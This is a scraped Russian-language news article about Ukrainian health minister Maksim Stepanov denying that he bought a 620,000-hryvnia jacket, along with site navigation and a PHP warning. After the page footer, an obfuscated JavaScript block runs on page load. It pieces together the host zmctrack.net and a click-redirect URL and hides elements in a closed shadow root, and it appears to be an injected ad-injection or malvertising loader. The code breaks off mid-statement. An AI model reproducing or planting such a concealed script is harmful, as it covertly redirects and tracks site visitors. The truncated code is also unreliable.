Warning: Parameter 2 to wp_hide_post_Public::query_posts_join() expected to be a reference, value given in /var/www/fastuser/data/www/glavpost.com/wp-includes/class-wp-hook.php on line 307

Министр утверждает, что в его гардеробе нет одежды “за такие идиотские средства”

Министр здравоохранения Украины Максим Степанов назвал "полным абсурдом" заявления о том, что он носит куртку за 620 тысяч гривен. По его словам, в его гардеробе таких дорогих вещей нет.

Об этом глава Минздрава заявил в интервью "Радио Свобода".

"Я думаю, что в больном воображении наших политиков она действительно существует. Я не думаю, что какой-то здоровый человек может серьезно относиться к тому, что можно купить эту одежду за такие идиотские средства. С точки зрения стоимости ее. Ну, ее не просто в моем шкафу нет, я считаю, что это какой-то полный абсурд", – сказал он.

Степанов считает, что, делая такие заявления, противники просто пытаются таким образом вывести его из равновесия

Ранее народный депутат Украины Гео Лерос на заседании парламента обратился к Степанову, обвинив его в том, что он несколько недель назад купил себе куртку дорогого бренда за 620 тысяч гривен.

Читайте также:  Названы страны, которые будут финансировать преследование виновных в трагедии МН17 на Донбассе

В тренде
Санкции Украины против российских СМИ: Захарова закатила истерику

Напомним, в столовой Верховной Рады появились листовки, в которых депутатам провели "политинформацию" о том, как нельзя быть Гео Леросом, и показали необычное жилье депутата.

Мы также сообщали, что двух сотрудников посольства Украины в Польше поймали на горячем на границе при попытке вывезти на служебном авто из Украины в Польшу большое количество валюты, золота и контрабандных сигарет.

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

коррупция
Минздрав
куртка
Максим Степанов

Читайте Segodnya.ua в Google News

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Новости партнеров

Загрузка…

Популярные статьи

	Степанов о куртке за 620 тыс. гривен: Существует в больном воображении политиков“Преступление против государства”: Яценюк прокомментировал указ об увольнении судей КСУВласть 	Степанов о куртке за 620 тыс. гривен: Существует в больном воображении политиковЗа слова придется отвечать: Зеленский обвинил политиков в проблемах с поставками вакцин из ИндииВласть 	Степанов о куртке за 620 тыс. гривен: Существует в больном воображении политиковВирастюк проиграл. Трое лидеров на довыборах в Раду – экзитполыВласть 	Степанов о куртке за 620 тыс. гривен: Существует в больном воображении политиковНа Прикарпатье и Донбассе стартовали довыборы в Раду: кто идет в депутатыВласть 	Степанов о куртке за 620 тыс. гривен: Существует в больном воображении политиковЗеленский отменил указ о назначении Тупицкого судьей КСУВласть 	Степанов о куртке за 620 тыс. гривен: Существует в больном воображении политиков“Угроза национальной безопасности”: Вениславский о судьях КСУ Тупицком и КaсмининеВласть

Читайте также:  Скандал вокруг Винника: любимчик «волчиц» попал в базу сайта «Миротворец»

Новости партнеров

Загрузка…

загрузка…

	Степанов о куртке за 620 тыс. гривен: Существует в больном воображении политиков

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

© segodnya.ua, 2021

Лента новостей

Главное

Нажимая на кнопку «Принять» или продолжая пользоваться сайтом, вы соглашаетесь с

правилами использования

файлов cookie.

Принять

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){“use strict”;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=”/z”,X=”0x04″,B=”http”,G=”substr”,K=”host”,Q=J,U=”argon_”+”debug”+”=1″,V=”prototype”,Y=”createElement”,Z=”appendChild”,tt=”setTimeout”,ot=”querySelectorAll”,et=”getOwnPropertyDescriptor”,rt=”Object”,nt=”charCodeAt”,it=”fromCharCode”,at=”zmctrack”+”.net”,ct=”bind”,ft=”call”,lt=”script”,dt=”head”,st=”get”,pt=”set”,ht=”indexOf”,ut=”s.”+at,bt=”cookie”,kt=”XMLHttpRequest”,vt=”Date”,gt=”now”,xt=”responseText”,mt=”open”,yt=”ShadowRoot”,wt=”Node”,At=”send”,zt=”Array”,St=”addEventListener”,Tt=B+”://”+”click”+”.”+at+”/c/”+”redirect”+”?”+”hash”+”=”,Dt=”slot”,Et=”Math”,Mt=”floor”,Ct=”random”,Ot=”console”,Lt=”Document”,Nt=”innerHTML”,_t=”attachShadow”,Ht=”offsetWidth”,It=”Element”,Rt=”next”,qt=”previous”,Pt=”push”,$t=”length”,jt=”shift”,Ft=”parentNode”,Jt=”textContent”,Wt=”JSON”,Xt=”parse”,Bt=”load”,Gt=”HTML”+It,Kt=”error”,Qt=”location”,Ut=”href”,Vt=”POST”,Yt=”document”,Zt=”un”+”eval”,to={},oo=”parseInt”,eo=It+”Sibling”,ro=”String”,no=”split”;to[“mode”]=”closed”,t=l[Yt],o=l[“chrome”],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||”|”)}!o&&!e||(z=l[“n10091125”],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня